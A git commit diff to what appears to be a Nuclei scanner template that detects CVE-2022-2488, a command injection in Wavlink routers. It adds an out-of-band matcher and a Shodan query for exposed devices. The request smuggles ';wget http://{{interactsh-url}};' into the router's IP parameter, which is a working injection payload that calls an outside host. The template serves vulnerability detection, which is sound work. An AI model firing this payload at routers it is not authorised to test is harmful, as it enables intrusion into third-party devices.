Update CVE-2022-2488.yaml
parent
a5b676bb39
commit
7a71ceefef
|
@ -10,8 +10,9 @@ info:
|
|||
- https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"Wi-Fi APP Login"
|
||||
tags: cve,cve2022,iot,wavlink,router
|
||||
tags: cve,cve2022,iot,wavlink,router,rce,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -19,8 +20,13 @@ requests:
|
|||
GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
||||
|
|
Loading…
Reference in New Issue